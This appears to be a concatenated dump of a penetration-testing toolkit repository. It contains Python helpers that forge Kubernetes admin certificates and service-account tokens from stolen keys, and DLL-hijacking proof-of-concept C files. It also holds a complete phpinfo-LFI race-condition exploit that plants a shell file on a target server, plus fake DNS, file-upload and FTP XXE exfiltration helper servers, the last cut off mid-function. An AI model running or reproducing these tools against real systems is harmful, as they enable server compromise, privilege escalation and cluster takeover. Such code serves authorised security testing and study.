received_info[recent_stream]['processed'] = True 323 | # just delete at this point?? 324 | 325 | 326 | #if receive_event: 327 | 328 | #if recent_stream and not received_info[recent_stream].get('processed', True): 329 | # #send_response(conn, receive_event, data=received_data if received_data else b'') 330 | # send_response(conn, received_info[event.stream_id].get('receive'), data=received_info[event.stream_id].get('data')) 331 | # received_info[recent_stream]['processed'] = True 332 | 333 | 334 | data_to_send = conn.data_to_send() 335 | if data_to_send: 336 | sock.sendall(data_to_send) 337 | 338 | #if received_headers and request_primitives: 339 | #if received_headers and request_primitives: 340 | #socket_name = (lambda x: x if x.startswith('/') else '')(sock.getsockname()) 341 | 342 | #print('Curl command to replicate received request: ' + build_curl_command(request_primitives, received_headers, received_data, socket_name)) 343 | except ConnectionResetError as e: 344 | print(str(e)) 345 | except BrokenPipeError as e: 346 | print(str(e)) 347 | print('===================================\n') 348 | 349 | 350 | sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) 351 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 352 | #sock.bind(('0.0.0.0', 8080)) 353 | sock.bind(socket_path) 354 | sock.listen(5) 355 | 356 | while True: 357 | handle(sock.accept()[0]) 358 | 359 | 360 | -------------------------------------------------------------------------------- /example_code/crypto_helpers.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key 2 | from cryptography.hazmat.primitives import serialization 3 | from cryptography.hazmat.primitives.asymmetric import padding 4 | from cryptography import x509 5 | from cryptography.hazmat.primitives import hashes 6 | from cryptography.hazmat.primitives.asymmetric import padding 7 | from cryptography.hazmat.backends import default_backend 8 | from cryptography.exceptions import InvalidSignature 9 | from cryptography.hazmat.primitives.asymmetric import rsa 10 | from cryptography.x509.oid import NameOID 11 | import datetime 12 | import base64 13 | import hashlib 14 | import jwt 15 | import json 16 | 17 | # fetch server CA from API server unauth?? 18 | 19 | def generate_private_key(keysize=2048, exp=65537): 20 | private_key = rsa.generate_private_key( 21 | public_exponent=exp, 22 | key_size=keysize 23 | ) 24 | return private_key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 25 | 26 | def private_key_to_disk(key_obj, output_file): 27 | open(output_file, 'wb').write(key_obj.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())) 28 | 29 | def private_key_from_file(key_file): 30 | return load_pem_private_key(open(key_file, 'rb').read(), password=None) 31 | 32 | def cert_from_file(cert_file): 33 | return x509.load_pem_x509_certificate(data=open(cert_file, 'rb').read(), backend=default_backend()) 34 | 35 | 36 | def public_key_from_private(key_file): 37 | return private_key_from_file(key_file).public_key() 38 | 39 | def cert_to_pem(cert): 40 | return cert.public_bytes(encoding=serialization.Encoding.PEM) 41 | 42 | def key_to_pem(key): 43 | return key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 44 | 45 | def pub_key_to_pem(pub): 46 | return pub.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.PKCS1) 47 | 48 | 49 | # TODO: Write this properly, use verify_directly_issued_by 50 | def verify_cert_from_cert(cert_file, signing_cert_file, padder=padding.PKCS1v15()): 51 | '''Doesnt work as well as .verify_directly_issued_by() misses issuer/subject match but checks signing''' 52 | chain = cert_from_file(signing_cert_file) 53 | issuer_public_key = chain.public_key() 54 | cert_to_check = cert_from_file(cert_file) 55 | try: 56 | issuer_public_key.verify( 57 | cert_to_check.signature, 58 | cert_to_check.tbs_certificate_bytes, 59 | padder, 60 | cert_to_check.signature_hash_algorithm, 61 | ) 62 | return True 63 | except InvalidSignature: 64 | return False 65 | except: 66 | raise 67 | 68 | 69 | 70 | 71 | def match_cert_and_key(cert_file, key_file): 72 | cert = cert_from_file(cert_file) 73 | cert_key = cert.public_key() 74 | pub_key = public_key_from_private(key_file) 75 | return cert_key == pub_key 76 | 77 | 78 | def verify_cert_from_key(cert_file, key_file, padder=padding.PKCS1v15()): 79 | issuer_public_key = public_key_from_private(key_file) 80 | cert_to_check = cert_from_file(cert_file) 81 | try: 82 | issuer_public_key.verify( 83 | cert_to_check.signature, 84 | cert_to_check.tbs_certificate_bytes, 85 | padder, 86 | cert_to_check.signature_hash_algorithm, 87 | ) 88 | return True 89 | except InvalidSignature: 90 | return False 91 | except: 92 | raise 93 | 94 | 95 | 96 | # system might need to be set for unicode strings...? 97 | def create_certificate(public_key, signer_key, signer_ca, exp=365, common_name='kubernetes-admin', org_names = ['system:masters'], verify=True): 98 | one_day = datetime.timedelta(1, 0, 0) 99 | 100 | builder = x509.CertificateBuilder() 101 | orgs = [x509.NameAttribute(NameOID.ORGANIZATION_NAME, a) for a in org_names] 102 | builder = builder.subject_name(x509.Name(orgs + [x509.NameAttribute(NameOID.COMMON_NAME, common_name)])) 103 | builder = builder.issuer_name(signer_ca.subject) # not working when I set this manually, why? 104 | builder = builder.not_valid_before(datetime.datetime.today() - one_day) 105 | builder = builder.not_valid_after(datetime.datetime.today() + (one_day * exp)) 106 | builder = builder.serial_number(x509.random_serial_number()) 107 | builder = builder.public_key(public_key) 108 | builder = builder.add_extension( 109 | x509.KeyUsage(digital_signature=True, key_encipherment=True, key_cert_sign=False, 110 | key_agreement=False, content_commitment=False, data_encipherment=False, 111 | crl_sign=False, encipher_only=False, decipher_only=False), critical=True 112 | ) 113 | builder = builder.add_extension( 114 | x509.ExtendedKeyUsage([x509.oid.ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False 115 | ) 116 | builder = builder.add_extension( 117 | x509.BasicConstraints(ca=False, path_length=None), critical=True, 118 | ) 119 | builder = builder.add_extension( 120 | x509.AuthorityKeyIdentifier.from_issuer_public_key(signer_key.public_key()), critical=False 121 | ) 122 | 123 | certificate = builder.sign( 124 | private_key=signer_key, algorithm=hashes.SHA256(), 125 | ) 126 | 127 | # sanity check, verifies issuer/subject and key sign 128 | if verify: 129 | certificate.verify_directly_issued_by(signer_ca) 130 | 131 | return certificate 132 | 133 | 134 | 135 | def cert_to_disk(cert_obj, output_filename): 136 | open(output_filename, 'wb').write(cert_obj.public_bytes(encoding=serialization.Encoding.PEM)) 137 | 138 | 139 | 140 | def dump_cert_auth(cert, key): 141 | out = ' client-certificate-data: {}\n'.format(base64.b64encode(cert_to_pem(cert)).decode('utf8')) 142 | out += ' client-key-data: {}\n'.format(base64.b64encode(key_to_pem(key)).decode('utf8')) 143 | return out 144 | 145 | 146 | 147 | 148 | def create_token_rsa(key, keyid, exp_window=3600, audience='theia-web-shell', subject='offensive-security', issuer='custom-auth'): 149 | '''Helper function to generate authentication tokens''' 150 | t = int(datetime.datetime.timestamp(datetime.datetime.now(datetime.timezone.utc))) 151 | iat = t 152 | nbf = t 153 | exp = iat + exp_window 154 | sd = {'exp' : exp, 'iat': iat, 'nbf' : nbf, 'iss': issuer, 'sub': subject, 'aud': audience} 155 | return jwt.encode(sd, key, algorithm='RS256', headers={'kid': keyid}) 156 | 157 | 158 | 159 | def forge_cert_authentication(ca_key_file, ca_cert_file, user_name='kubernetes-admin', user_key_file=None, permissions=['system:masters'], cert_expiry_days=365): 160 | ca_key = private_key_from_file(ca_key_file) 161 | ca_cert = cert_from_file(ca_cert_file) 162 | user_key = None 163 | if not user_key_file: 164 | user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048) 165 | else: 166 | user_key = private_key_from_file(user_key_file) 167 | forged_cert = create_certificate(user_key.public_key(), ca_key, ca_cert, exp=cert_expiry_days, common_name=user_name, org_names=permissions) 168 | return dump_cert_auth(forged_cert, user_key) 169 | 170 | 171 | def b64dec(val): 172 | return base64.urlsafe_b64decode(val + '==') 173 | 174 | 175 | def gen_public_key_keyid(pub_key_obj): 176 | return base64.urlsafe_b64encode(hashlib.sha256(pub_key_obj.public_bytes(encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo)).digest()).decode().rstrip('=') 177 | 178 | 179 | 180 | def create_sa_token(sa_key, serviceaccount_name, serviceaccount_uid, namespace='default', aud='https://kubernetes.default.svc.cluster.local', iss='https://kubernetes.default.svc.cluster.local'): 181 | t = int(datetime.datetime.timestamp(datetime.datetime.now(datetime.timezone.utc))) 182 | exp = 31536000 183 | sd = {'aud': [aud], 184 | 'exp': t+exp, 185 | 'iat': t, 186 | 'iss': iss, 187 | 'kubernetes.io': { 188 | 'namespace': namespace, 189 | 'serviceaccount': {'name': serviceaccount_name, 'uid': serviceaccount_uid} 190 | }, 191 | 'nbf': t, 192 | 'sub': 'system:serviceaccount:{}:{}'.format(namespace, serviceaccount_name)} 193 | keyid = gen_public_key_keyid(sa_key.public_key()) 194 | return jwt.encode(sd, sa_key, algorithm='RS256', headers={'kid': keyid}) 195 | 196 | 197 | 198 | 199 | def verify_sa_token(sa_pub_key, token): 200 | audience = json.loads(b64dec(token.split('.')[1]).decode())['aud'] 201 | return jwt.decode(token, sa_pub_key, 'RS256', audience=audience) 202 | 203 | 204 | 205 | -------------------------------------------------------------------------------- /example_code/ddlmb.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | // Example code for dll hijacking 5 | // x86_64-w64-mingw32-gcc dll.c -shared -o dll.dll 6 | 7 | 8 | /* 9 | typedef struct _WTS_PROCESS_INFOW { 10 | DWORD SessionId; 11 | DWORD ProcessId; 12 | LPWSTR pProcessName; 13 | PSID pUserSid; 14 | } WTS_PROCESS_INFOW, *PWTS_PROCESS_INFOW; 15 | 16 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateProcessesW (HANDLE hServer, DWORD Reserved, DWORD Version, PWTS_PROCESS_INFOW* ppProcessInfo, DWORD* pCount) { 17 | return false; 18 | } 19 | 20 | extern "C" __declspec(dllexport) BOOL __cdecl WTSQueryUserToken (ULONG SessionID, PHANDLE phToken) { 21 | return false; 22 | } 23 | 24 | extern "C" __declspec(dllexport) void __cdecl WTSFreeMemory(PVOID pMemory) { 25 | } 26 | 27 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateSessionsW(){ 28 | return false; 29 | } 30 | */ 31 | 32 | 33 | char debugMsg [1024] = ""; 34 | 35 | 36 | extern "C" __declspec(dllexport) BOOL __cdecl PE1(){ 37 | //system("whoami > C:\\sample\\pe1.txt"); 38 | MessageBox (NULL, debugMsg, "1", MB_OK); 39 | return false; 40 | } 41 | 42 | 43 | 44 | extern "C" __declspec(dllexport) BOOL __cdecl PE2(){ 45 | //system("whoami > C:\\sample\\pe2.txt"); 46 | MessageBox (NULL, debugMsg, "2", MB_OK); 47 | return false; 48 | } 49 | 50 | 51 | // ordinal 3 52 | extern "C" __declspec(dllexport) BOOL __cdecl PE3(){ 53 | MessageBox (NULL, debugMsg, "3", MB_OK); 54 | system("whoami > C:\\sample\\pe3.txt"); 55 | return false; 56 | } 57 | 58 | 59 | 60 | 61 | 62 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ 63 | switch(dwReason){ 64 | case DLL_PROCESS_ATTACH: 65 | //MessageBox (NULL, debugMsg, "Debug", MB_OK); 66 | // system("whoami > C:\\users\\public\\documents\\whoami.txt"); 67 | break; 68 | case DLL_PROCESS_DETACH: 69 | break; 70 | case DLL_THREAD_ATTACH: 71 | break; 72 | case DLL_THREAD_DETACH: 73 | break; 74 | } 75 | return TRUE; 76 | } 77 | -------------------------------------------------------------------------------- /example_code/django_audit_snippets.py: -------------------------------------------------------------------------------- 1 | from django.conf import settings 2 | from urls import urlpatterns 3 | 4 | ''' 5 | Access shell via 6 | ./manage.py shell 7 | (or shell_plus if you have django-extensions) 8 | Dont forget you may need to set environment variables: 9 | - DJANGO_SETTINGS_MODULE to the settings file (python module load syntax like settings.filename) and 10 | - PYTHONPATH to include the path where the Django code sits 11 | 12 | Install ipython and django-extensions to get a better shell (shell_plus) 13 | pip install django-extensions 14 | 15 | This also has show_urls command which will do something similar to get_urls_friendly below 16 | 17 | urls will not contain urlpatterns in later django releases 18 | ''' 19 | 20 | 21 | # all the configured apps settings are now in here 22 | settings 23 | 24 | # this prints out mapped urls and associated views 25 | def get_urls_friendly(raw_urls, nice_urls=[], urlbase=''): 26 | '''Recursively builds a list of all the urls in the current project and the name of their associated view''' 27 | for entry in raw_urls: 28 | fullurl = (urlbase + entry.regex.pattern).replace('^','') 29 | if entry.callback: 30 | viewname = entry.callback.func_name 31 | nice_urls.append('%s - %s' %(fullurl, viewname)) 32 | else: 33 | get_urls_friendly(entry.url_patterns, nice_urls, fullurl) 34 | nice_urls = sorted(list(set(nice_urls))) 35 | return nice_urls 36 | -------------------------------------------------------------------------------- /example_code/dll.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | // Example code for dll hijacking 5 | // x86_64-w64-mingw32-gcc dll.c -shared -o dll.dll 6 | 7 | 8 | typedef struct _WTS_PROCESS_INFOW { 9 | DWORD SessionId; 10 | DWORD ProcessId; 11 | LPWSTR pProcessName; 12 | PSID pUserSid; 13 | } WTS_PROCESS_INFOW, *PWTS_PROCESS_INFOW; 14 | 15 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateProcessesW (HANDLE hServer, DWORD Reserved, DWORD Version, PWTS_PROCESS_INFOW* ppProcessInfo, DWORD* pCount) { 16 | return false; 17 | } 18 | 19 | extern "C" __declspec(dllexport) BOOL __cdecl WTSQueryUserToken (ULONG SessionID, PHANDLE phToken) { 20 | return false; 21 | } 22 | 23 | extern "C" __declspec(dllexport) void __cdecl WTSFreeMemory(PVOID pMemory) { 24 | } 25 | 26 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateSessionsW(){ 27 | return false; 28 | } 29 | 30 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ 31 | switch(dwReason){ 32 | case DLL_PROCESS_ATTACH: 33 | system("whoami > C:\\users\\public\\documents\\whoami.txt"); 34 | break; 35 | case DLL_PROCESS_DETACH: 36 | break; 37 | case DLL_THREAD_ATTACH: 38 | break; 39 | case DLL_THREAD_DETACH: 40 | break; 41 | } 42 | return TRUE; 43 | } -------------------------------------------------------------------------------- /example_code/dll_with_proxies.c: -------------------------------------------------------------------------------- 1 | // i686-w64-mingw32-g++ dll.c -lws2_32 -o wtsapi32.dll -shared 2 | #include 3 | #include 4 | #include 5 | #include 6 | BOOL IsElevated() { 7 | BOOL fRet = FALSE; 8 | HANDLE hToken = NULL; 9 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 10 | TOKEN_ELEVATION Elevation; 11 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 12 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 13 | fRet = Elevation.TokenIsElevated; 14 | } 15 | } 16 | if (hToken) { 17 | CloseHandle(hToken); 18 | } 19 | return fRet; 20 | } 21 | asm (".section .drectve\n\t.ascii \" -export:WTSEnumerateProcessesW=c:/windows/system32/wtsapi32.WTSEnumerateProcessesW\""); 22 | asm (".section .drectve\n\t.ascii \" -export:WTSQueryUserToken=c:/windows/system32/wtsapi32.WTSQueryUserToken\""); 23 | asm (".section .drectve\n\t.ascii \" -export:WTSFreeMemory=c:/windows/system32/wtsapi32.WTSFreeMemory\""); 24 | asm (".section .drectve\n\t.ascii \" -export:WTSEnumerateSessionsW=c:/windows/system32/wtsapi32.WTSEnumerateSessionsW\""); 25 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ 26 | BOOL elevated; 27 | char username[UNLEN+1]; 28 | DWORD username_len = UNLEN + 1; 29 | char out[UNLEN+28]; 30 | switch(dwReason){ 31 | case DLL_PROCESS_ATTACH: 32 | elevated = IsElevated(); 33 | GetUserName(username, &username_len); 34 | strcpy(out, "Running "); 35 | if (elevated) { 36 | strcat(out, "elevated as user "); 37 | } else { 38 | strcat(out, "unelevated as user "); 39 | } 40 | strcat(out, username); 41 | MessageBox(0, out, "Dll Hijacking POC Code", 0); 42 | break; 43 | case DLL_PROCESS_DETACH: 44 | break; 45 | case DLL_THREAD_ATTACH: 46 | break; 47 | case DLL_THREAD_DETACH: 48 | break; 49 | } 50 | return TRUE; 51 | } -------------------------------------------------------------------------------- /example_code/getControllers.cs: -------------------------------------------------------------------------------- 1 | // lists controllers when added to a web application 2 | // returns result as a string 3 | public String getControllers() 4 | { 5 | var asms = AppDomain.CurrentDomain.GetAssemblies().Where(a => a.GetName().Name != "System.Web.Mvc"); 6 | String output = ""; 7 | foreach (Assembly asm in asms) 8 | { 9 | String s = ""; 10 | try 11 | { 12 | var controllers = asm.GetExportedTypes().Where(t => typeof(ControllerBase).IsAssignableFrom(t)); 13 | if (controllers.Count() > 0) 14 | { 15 | s += string.Format("\r\n{0}\r\nAssembly: {1}\r\n{2}\r\n", new String('=',32), asm.GetName().Name, new String('=', 32)); 16 | } 17 | foreach (Type controller in controllers) 18 | { 19 | s += string.Format("{0}\r\nController: {1}\r\n{2}\r\n", new String('-', 32), controller.Name, new String('-', 32)); 20 | List bannedDeclaringTypes = new List { "System.Object", "System.Web.Mvc.ControllerBase", "System.Web.Mvc.Controller" }; 21 | //List bannedDeclaringTypes = new List { }; 22 | String cattribs = "Controller Attributes: "; 23 | var cattributes = controller.GetCustomAttributes(false); 24 | foreach (var attribute in cattributes) 25 | { 26 | cattribs += string.Format("{0},", attribute); 27 | } 28 | s += string.Format("{0}\r\n", cattribs); 29 | var methods = controller.GetMethods().Where(m => m.IsPublic && !bannedDeclaringTypes.Contains(m.DeclaringType.FullName)); 30 | foreach (var method in methods) 31 | { 32 | s += string.Format("Method: {0}\r\n", method.Name); 33 | 34 | String attribs = "Method Attributes: "; 35 | var attributes = method.GetCustomAttributes(false); 36 | foreach (var attribute in attributes) 37 | { 38 | attribs += string.Format("{0},", attribute); 39 | } 40 | s += string.Format("{0}\r\n", attribs); 41 | 42 | var parameters = method.GetParameters(); 43 | String pdata = "Method Parameters: "; 44 | foreach (var param in parameters) 45 | { 46 | pdata += string.Format("(Name: {0}, Type: {1}),", param.Name, param.ParameterType.Name); 47 | } 48 | s += string.Format("{0}\r\n", pdata); 49 | 50 | s += string.Format("Method Return Type: {0}\r\n\r\n", method.ReturnType.Name); 51 | } 52 | } 53 | } 54 | catch 55 | { 56 | s += string.Format("\r\nAssembly {0} failed parsing\r\n", asm.GetName().Name); 57 | } 58 | output += s; 59 | } 60 | return output; 61 | } 62 | -------------------------------------------------------------------------------- /exploits/phpinfo_lfi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # Based on the original code from Insomnias paper linked below, updated for python3, to tweak some settings and for readability because ow my eyes... 3 | # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf 4 | 5 | # Its not uncommon to have to try this a few times before it successfully works 6 | # The output_buffering setting in php (viewable in phpinfo output) must be enabled for this to work 7 | # No TLS support, you will need to SSL wrap the socket connection yourself to add this capability 8 | 9 | import sys 10 | import threading 11 | import socket 12 | 13 | # Change the following six constants to match your requirements 14 | 15 | # Request to send to trigger the LFI, values in square brackets are replaced as needed by the exploit code and need to be included 16 | LFIREQ = """GET /index.php?file=../../../../../../..[INCLUDEFILE] HTTP/1.1\r 17 | Host: [HOSTNAME][PORT]\r 18 | User-Agent: Mozilla/4.0\r 19 | Proxy-Connection: Keep-Alive\r 20 | \r 21 | \r 22 | """ 23 | 24 | # Location of the phpinfo() script 25 | INFOURL='/phpinfo.php' 26 | 27 | # location where you want the permanent LFI payload to be written 28 | PAYLOADFILE='/tmp/includefile' 29 | 30 | # contents you want to write to the permanent LFI payload, anything containing single quotes untested and will require PHP specific escaping 31 | PAYLOADCONTENTS='' 32 | 33 | # size of padding to apply in headers and url to increase response size, needs to not overflow receiving web servers size capabilities in these areas, as big as possible is usually best 34 | PADDING=8000 35 | 36 | # maximum number of times to attempt the attack before giving up 37 | MAXATTEMPTS=2000 38 | 39 | 40 | 41 | # Shouldnt need to change anything below this point 42 | 43 | REQ1 = """POST [INFOURL]?a=[PADDING] HTTP/1.1\r 44 | Host: [HOSTNAME][PORT]\r 45 | Cookie: cookie=[PADDING]\r 46 | HTTP_ACCEPT: [PADDING]\r 47 | HTTP_USER_AGENT: [PADDING]\r 48 | HTTP_ACCEPT_LANGUAGE: [PADDING]\r 49 | HTTP_PRAGMA: [PADDING]\r 50 | Content-Type: multipart/form-data; boundary=---------------------------7db268605ae\r 51 | Content-Length: [LENGTH]\r 52 | \r 53 | """ 54 | 55 | REQ1_DATA = """-----------------------------7db268605ae\r 56 | Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r 57 | Content-Type: text/plain\r 58 | \r 59 | [PAYLOAD]\r 60 | -----------------------------7db268605ae""" 61 | 62 | 63 | def setup(host, port): 64 | tag="Security Test" 65 | payload = tag + """\r\n""".format(PAYLOADFILE, PAYLOADCONTENTS) 66 | request_data = REQ1_DATA.replace('[PAYLOAD]', payload) 67 | params = { 68 | 'PADDING': "A" * PADDING, 69 | 'LENGTH': str(len(request_data)), 70 | 'HOSTNAME' : host, 71 | 'PORT': ':{}'.format(port) if port != 80 else '', 72 | 'INFOURL' : INFOURL 73 | 74 | } 75 | lfireq = LFIREQ 76 | request = REQ1 77 | for key in params: 78 | request = request.replace('[{}]'.format(key), params[key]) 79 | lfireq = lfireq.replace('[{}]'.format(key), params[key]) 80 | 81 | request += request_data 82 | 83 | return(request, tag, lfireq) 84 | 85 | 86 | 87 | 88 | def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): 89 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 90 | s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | 92 | s.connect((host, port)) 93 | s2.connect((host, port)) 94 | 95 | s.send(phpinforeq.encode()) 96 | d = b"" 97 | while len(d) < offset: 98 | d += s.recv(offset) 99 | if b"[tmp_name] =" in d: 100 | try: 101 | i = d.index(b"[tmp_name] =") 102 | fn = d[i+17:i+31] 103 | except ValueError: 104 | return None 105 | 106 | lfireq = lfireq.replace('[INCLUDEFILE]', fn.decode('utf8')) 107 | s2.send(lfireq.encode()) 108 | d = s2.recv(4096) 109 | s.close() 110 | s2.close() 111 | 112 | if d.find(tag.encode()) != -1: 113 | return fn 114 | 115 | counter=0 116 | class ThreadWorker(threading.Thread): 117 | def __init__(self, e, l, m, *args): 118 | threading.Thread.__init__(self) 119 | self.event = e 120 | self.lock = l 121 | self.maxattempts = m 122 | self.args = args 123 | 124 | def run(self): 125 | global counter 126 | while not self.event.is_set(): 127 | with self.lock: 128 | if counter >= self.maxattempts: 129 | return 130 | counter+=1 131 | 132 | try: 133 | x = phpInfoLFI(*self.args) 134 | if self.event.is_set(): 135 | break 136 | if x: 137 | print("\nGot it! Shell created in {}".format(PAYLOADFILE)) 138 | self.event.set() 139 | 140 | except socket.error: 141 | return 142 | 143 | 144 | def getOffset(host, port, phpinforeq): 145 | """Gets offset of tmp_name in the php output""" 146 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 147 | s.connect((host,port)) 148 | s.send(phpinforeq.encode()) 149 | 150 | d = b"" 151 | while True: 152 | i = s.recv(4096) 153 | d+=i 154 | if i == "": 155 | break 156 | # detect the final chunk 157 | if i.endswith(b"0\r\n\r\n"): 158 | break 159 | s.close() 160 | i = d.find(b"[tmp_name] =") 161 | if i == -1: 162 | raise ValueError("No php tmp_name in phpinfo output") 163 | 164 | print("found %s at %i" % (d[i:i+10],i)) 165 | # padded up a bit 166 | return i+256 167 | 168 | def main(): 169 | 170 | print("LFI With PHPInfo()") 171 | print("-=" * 30) 172 | 173 | if len(sys.argv) < 2: 174 | print("Usage: %s host [port] [threads]" % sys.argv[0]) 175 | sys.exit(1) 176 | 177 | try: 178 | host = socket.gethostbyname(sys.argv[1]) 179 | except socket.error as e: 180 | print("Error with hostname %s: %s" % (sys.argv[1], e)) 181 | sys.exit(1) 182 | 183 | port=80 184 | try: 185 | port = int(sys.argv[2]) 186 | except IndexError: 187 | pass 188 | except ValueError as e: 189 | print("Error with port %d: %s" % (sys.argv[2], e)) 190 | sys.exit(1) 191 | 192 | poolsz=10 193 | try: 194 | poolsz = int(sys.argv[3]) 195 | except IndexError: 196 | pass 197 | except ValueError as e: 198 | print("Error with poolsz %d: %s" % (sys.argv[3], e)) 199 | sys.exit(1) 200 | 201 | print("Getting initial offset...", end=' ') 202 | reqphp, tag, reqlfi = setup(host, port) 203 | offset = getOffset(host, port, reqphp) 204 | sys.stdout.flush() 205 | 206 | maxattempts = MAXATTEMPTS 207 | e = threading.Event() 208 | l = threading.Lock() 209 | 210 | print("Spawning worker pool (%d)..." % poolsz) 211 | sys.stdout.flush() 212 | 213 | tp = [] 214 | for i in range(0,poolsz): 215 | tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) 216 | 217 | for t in tp: 218 | t.start() 219 | try: 220 | while not e.wait(1): 221 | if e.is_set(): 222 | break 223 | with l: 224 | sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) 225 | sys.stdout.flush() 226 | if counter >= maxattempts: 227 | break 228 | print() 229 | if e.is_set(): 230 | print("Woot! \m/") 231 | else: 232 | print(":(") 233 | except KeyboardInterrupt: 234 | print("\nTelling threads to shutdown...") 235 | e.set() 236 | 237 | print("Shuttin' down...") 238 | for t in tp: 239 | t.join() 240 | 241 | if __name__=="__main__": 242 | print("Don't forget to modify the application constants to match your requirements") 243 | main() 244 | -------------------------------------------------------------------------------- /helper_servers/dns.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | import sys 4 | 5 | 6 | # My minor modification of pyminifakeDNS, originally by Francisco Santos 7 | 8 | class DNSQuery: 9 | def __init__(self, data): 10 | self.data=data 11 | self.dominio='' 12 | 13 | tipo = (ord(data[2]) >> 3) & 15 # Opcode bits 14 | if tipo == 0: # Standard query 15 | ini=12 16 | lon=ord(data[ini]) 17 | while lon != 0: 18 | self.dominio+=data[ini+1:ini+lon+1]+'.' 19 | ini+=lon+1 20 | lon=ord(data[ini]) 21 | 22 | def request(self, ip): 23 | packet='' 24 | if self.dominio: 25 | packet+=self.data[:2] + "\x81\x80" 26 | packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts 27 | packet+=self.data[12:] # Original Domain Name Question 28 | packet+='\xc0\x0c' # Pointer to domain name 29 | packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes 30 | packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP 31 | return packet 32 | 33 | if __name__ == '__main__': 34 | 35 | try: 36 | ip = sys.argv[1] 37 | socket.inet_aton(ip) 38 | except: 39 | print 'Provide IP address to resolve all names to as parameter 1' 40 | sys.exit(1) 41 | 42 | 43 | print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip 44 | udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 45 | udps.bind(('',53)) 46 | 47 | try: 48 | while 1: 49 | data, addr = udps.recvfrom(1024) 50 | p=DNSQuery(data) 51 | udps.sendto(p.request(ip), addr) 52 | print 'Request: %s -> %s from %s' % (p.dominio, ip, addr) 53 | except KeyboardInterrupt: 54 | print 'Finalise' 55 | udps.close() 56 | -------------------------------------------------------------------------------- /helper_servers/flask_upload.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template, request, redirect, url_for 2 | from werkzeug.utils import secure_filename 3 | import datetime 4 | import os 5 | 6 | def timestamp(): 7 | return datetime.datetime.now().strftime('%Y%m%d%H%M%S') 8 | 9 | app = Flask(__name__) 10 | app.config['UPLOAD_FOLDER'] = '/uploads' 11 | 12 | 13 | @app.route('/', methods=['GET']) 14 | def index(): 15 | return ''' 16 | 17 | Hi 18 | Hi 19 | ''' 20 | 21 | #curl -F file=@"/tmp/test.txt" https://[site]/[app_path]/ul 22 | @app.route('/ul', methods=['GET', 'POST']) 23 | def upload_file(): 24 | if request.method == 'POST': 25 | if 'file' not in request.files: 26 | return redirect(request.url) 27 | file = request.files['file'] 28 | if file.filename == '': 29 | return redirect(request.url) 30 | if file: 31 | filename = '{}_{}.data'.format(timestamp(), secure_filename(file.filename)) 32 | file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) 33 | return redirect(url_for('upload_file')) 34 | return ''' 35 | 36 | Upload 37 |
38 | 39 | 40 |
41 | ''' 42 | 43 | 44 | if __name__ == '__main__': 45 | app.run(host='0.0.0.0', port=8000) 46 | -------------------------------------------------------------------------------- /helper_servers/ftp-xxe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import time, socket 4 | from optparse import OptionParser 5 | from SocketServer import BaseRequestHandler, ThreadingTCPServer 6 | from sys import stdout 7 | 8 | class FTPHandler(BaseRequestHandler): 9 | """Handler for FTP sessions.""" 10 | 11 | def debug(self, message): 12 | """Show log message.""" 13 | if self.server.debug: 14 | print '***', message 15 | 16 | def respond(self, code, explanation): 17 | """Send a response to the client.""" 18 | self.request.send('%d %s\r\n' % (code, explanation)) 19 | 20 | def process_request(self): 21 | """Parse input into a command and an argument.""" 22 | data = self.recvall() 23 | parts = data.strip().split(' ',1) 24 | return parts.pop(0), parts, data.strip() 25 | 26 | def log_auth(self, user, password): 27 | """Write data to logfile.""" 28 | 29 | line = ' '.join((now, client, user, password)) 30 | self.server.logfile.write(line + '\n') 31 | self.server.logfile.flush() 32 | 33 | def save_to_file(self, data): 34 | client = '%s:%d' % self.client_address 35 | filename = client + '-' + str(int(time.time())) 